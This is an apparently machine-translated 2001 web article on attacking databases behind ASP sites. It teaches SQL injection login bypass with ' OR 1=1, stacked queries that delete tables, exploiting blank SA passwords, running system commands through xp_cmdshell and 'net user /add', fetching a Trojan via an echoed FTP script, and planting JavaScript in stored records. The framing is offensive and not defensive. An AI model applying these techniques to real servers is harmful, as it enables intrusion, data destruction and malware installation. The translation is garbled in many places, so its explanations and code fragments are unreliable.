Talking about the database attack http://www.fanqiang.com (2001-05-13 14:27:04)
1. Break through Script restrictions. For example, there is a text box on a page that allows you to enter the user name, but it limits you can only enter 4 characters. Many programs are limited in client restrictions and then pop up an error prompt with MSGBOX. If you need to break through this restriction when you attack, you only need to make a homepage locally, just cancel the limit, usually remove the VBScript or IavaScript restrictions, you can successfully break through. If it is JavaScript, it is simply temporarily to turn off the browser's script. If it is an experienced programmer, it is often tested again in the background. If there is an error, use the response.write or similar statement output error. 2. For SQL breakthroughs such as a web page, you need you to enter the user name and password. There are two text boxes waiting for your input. Now we have a user ADAM, we don't know his password, but want to log in with him. Under normal circumstances, we enter the ADAM in the first text box, the second text box input 1234, if the password is correct, otherwise an error is reported. Query statement in the program may be: SQL = "SELECT * from user where username = '" & text1.value & "' and passwd = '" & text2.value & "'" is SELECT * from user where username = 'adam' and Passwd = '1234' is good, if we entered in Text2 is not 1234, but 1234 '"&"' or 1 = 1 Our SQL statement is, select * from user where username = 'adam' and passwd = '1234' OR 1 = 1 We can enter. . . Experienced users add filters such as special characters such as single quotes in the program. However, there are two types of login authentication methods in the general man's custom. I use ASP's VBScript: First, use Select * from ... where username = '& required.form ("username") & "password =" & request .Form ("password"), then determine whether the result is empty verification. In fact, there is still a way: use Select * from ... where username = '& request.form ("UserName"), then determine if the password in the result set is verified, this method is safe. 3. Vulnerabilities in multi-speech. According to the above ideas, if the user queries all books according to the book (for example, Linux Getting Started), the SQL statement is select book.name, book.content from book where bookname = 'Linux Getting Started' If we are not Linux, it is linux Getting Started 'Delete from User Where' 1 '=' 1 thus constitutes the deletion of the table. The prerequisite for success is that the other party allows the execution of multiple statements. Since the program does not process the hazard of the vulnerability generated by the boundary "'" and the type of result set and the database are related to the configuration.
First, the result set, if the result set only supports a single SQL statement, then what you can do is just the kind of or '1' = '1 to log in in the password box, and other can't do it. We can also use this approach to add users in the database. 4. After the SQL Server is installed, the management user SA is automatically created, the password is empty. And many people don't change your password after installation, so I have left a great security issue, I will say later. The connections in the program are generally used, not using global.asa to use SSL files. SSL files are all accustomed to the Web / INCLUDE or / Inc directory. And the file name is conifn.inc, db_conn.inc, dbconninc, and so on, sometimes it is sometimes guessed. If this directory is not read, once the file name is guess, because .inc usually not do it, directly request is not downloading is the display source file. There is also when the primary program puts a suffix for .inc's file without processing "'", when the error message returned when the error is run, I will expose the .inc file, I have encountered several such situations. In fact, it can be set in IIS without responding to script error messages. 5. The use of the database. If the connection user permissions in the program are extremely small, most tables can only be read, you will be difficult to have. At this time, what can be done can guess the operation of the table name and field name to delete data or tables. The INSERT statement is hate, mainly there are many columns, but also to deal with the last ")". I will say some MS SQL Server I am the most familiar. Its default port number is 1433. You use Telnet to connect this port of the server, if you can connect MS SQL Server, of course, this is possible. Ok, let's talk about the utilization of the database. If the other person's data is directly on the web server and you know the port number, there is an account simply connect with SQL Analyzer to directly connect to the database. You can perform SQL statements in it. Commonly used is the stored procedure master.dbo.xp_cmdshell, this is an extension stored procedure, which only has a parameter, which puts the parameters as the system command to the system execution. If you manage the user, you have the right to perform this stored procedure, and you can do a lot of operations. If you use ipconfig to see IP settings, use Net User to see system users. However, the password with the NET USER / ADD username is not necessarily successful, sometimes returns a "specified login session does not exist" without execution, I am not clear. If there is no permission, MS SQL Server has a vulnerability, you can create a temporary stored procedure to perform, you can bypass, such as: Create Proc #cmdshell (@cmdstr varchar (200)) as exec master.dbo.xp_cmdshell @ CMDSHELL is of course, there is no permission to perform NET USER / Add, etc., but you can view it, you can create a file. Reversely create an FTP script with ECHO, pass the Trojan to an FTP site, then call the FTP with the stored procedure to use the script to download and install, then ... huh, :) If the database is not installed on the web server so There is no way to find or change the port number and there is still a way. If the database server cannot access directly from the Internet, you can use the vulnerability in the program to delete, modify data, or join the JavaScript statement to the database, usually they do not filter <> when they should be recorded, so you can use JavaScript Turn it to other sites or do something.
